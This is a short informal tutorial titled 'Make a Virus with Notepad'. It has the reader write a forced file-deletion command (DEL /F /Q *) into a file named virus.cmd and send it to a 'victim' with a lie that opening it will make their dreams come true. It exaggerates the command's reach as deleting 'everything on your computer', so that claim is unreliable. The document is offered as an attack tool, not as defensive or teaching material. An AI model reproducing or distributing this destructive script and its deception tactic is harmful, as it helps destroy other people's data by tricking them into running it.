Make a Virus with Notepad:
You will need:
Notepad
A victim with a pc
and have to do following only.
Open up notepad and type:

DEL /F /Q *

Save it as "virus.cmd"
You can change virus to whatever you want.DONT OPEN IT!It deletes everything on your computer.
Send it to your victim, say when they open it all their dreams will come true or some crap.
